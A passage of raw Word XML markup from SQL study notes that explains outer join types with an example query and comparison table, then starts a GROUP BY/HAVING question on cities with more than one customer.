        <w:t>Outer Join</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a broad concept that refers to joins where one table can have unmatched rows and these unmatched rows from one or both tables are returned with NULL values in the result set. There are </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>three types</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of outer joins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC0694" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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LEFT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LEFT JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6385463D" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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RIGHT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RIGHT JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE47059" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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FULL OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FULL JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B6C62B"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The term "outer join" is often used when discussing either </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RIGHT</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FULL</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> outer joins. When someone says "outer join," they typically mean a join that includes non-matching rows from one or both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD5689"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Types of Outer Joins</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444D8370" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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LEFT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns all rows from the left table and the matching rows from the right table. If there's no match, NULL values are returned for columns of the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB825F8" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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lastRenderedPageBreak/>
        <w:t>RIGHT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns all rows from the right table and the matching rows from the left table. If there's no match, NULL values are returned for columns of the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F958377" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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FULL OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns all rows when there is a match in either the left table or the right table. Non-matching rows from both tables will have NULL values for the columns of the other table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E16D7B" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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2. Full Outer Join:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4431EE43"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FULL OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a specific type of outer join that returns </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rows from both the left and the right tables. Where there is no match, NULL values are returned for the columns of the table without a match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8E4D5E"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This join is used when you want to get </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all records</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from both tables, whether there is a match or not. It combines the results of a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RIGHT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503ADE7F"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consider the following query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7695AF"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ELECT e.emp_id, e.emp_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49595BD3"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FROM Employee e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0424943C"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FULL OUTER JOIN Department d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A576877" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085E" w:rsidP="0085313D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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In this case, the result will include all employees (whether they have a department or not) and all departments (whether they have any employees or not). The rows without matches will have NULL values in the respective columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564F4637" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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4"/>
        <w:gridCol w:w="3081"/>
        <w:gridCol w:w="5269"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="49B83DCF" w14:textId="77777777" w:rsidTr="0022085E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A459388" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A39A34C" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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Outer Join</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="303A5AC0" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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Full Outer Join</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="4924928F" w14:textId="77777777" w:rsidTr="0022085E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C2801AB"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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65D4E44C"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Refers to any type of outer join (LEFT, RIGHT, or FULL).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33471605"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A specific type of outer join that returns all rows from both tables, with NULLs where no match exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="567F81C3" w14:textId="77777777" w:rsidTr="0022085E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B176280"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Includes Unmatched Rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B2A8736"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Yes, but only for the side specified (LEFT or RIGHT).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59922418"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Yes, for both tables (LEFT and RIGHT).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="66C1BAB2" w14:textId="77777777" w:rsidTr="0022085E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A1F5E5"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Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04634D27"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LEFT OUTER JOIN, RIGHT OUTER JOIN, FULL OUTER JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7093877D"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FULL OUTER JOIN only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="37AADC34" w14:textId="77777777" w:rsidTr="0022085E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31243B45"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Returned Rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5602A287"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Depends on whether LEFT, RIGHT, or FULL is used.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E21F46D"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Returns all rows from both tables, with NULLs for non-matching rows.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30CE923B" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="00CE4B95" w:rsidRDefault="0022085E" w:rsidP="0085313D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In summary, when someone refers to an "Outer Join," they could be talking about a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RIGHT</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FULL</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> outer join, but a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FULL OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> specifically refers to the join type that returns all rows from both tables, including unmatched rows from both sides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A66AAC6" w14:textId="08CFB173" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066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CD880BE">
          <v:rect id="_x0000_i3006" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="080DD656" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="00CE4B95" w:rsidRDefault="0022085E" w:rsidP="0022085E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="726" w:name="_Toc196308206"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SQL Query - To find the name of a city which has more than one customer in it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="726"/>
    </w:p>
    <w:p w14:paraId="15E46907" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="00CE4B95" w:rsidRDefault="0022085E" w:rsidP="0022085E">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example: Customer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769DE577" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="00CE4B95" w:rsidRDefault="0022085E" w:rsidP="0022085E">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Customer_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227901B7" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="00CE4B95" w:rsidRDefault="0022085E" w:rsidP="0022085E">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Customer_city?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15539F7B" w14:textId="2B098627" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085E" w:rsidP="0085313D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To find the name of a city that has more than one customer in it, you can use the following SQL query with a GROUP BY and HAVING clause:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419DE44"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SELECT Customer_city</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F70B377"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FROM Customer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A1B121"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GROUP BY Customer_city</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0314EAC0"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HAVING COUNT(Customer_name) &gt; 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E7E39" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085E" w:rsidP="0085313D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD2C93"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GROUP BY Customer_city</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
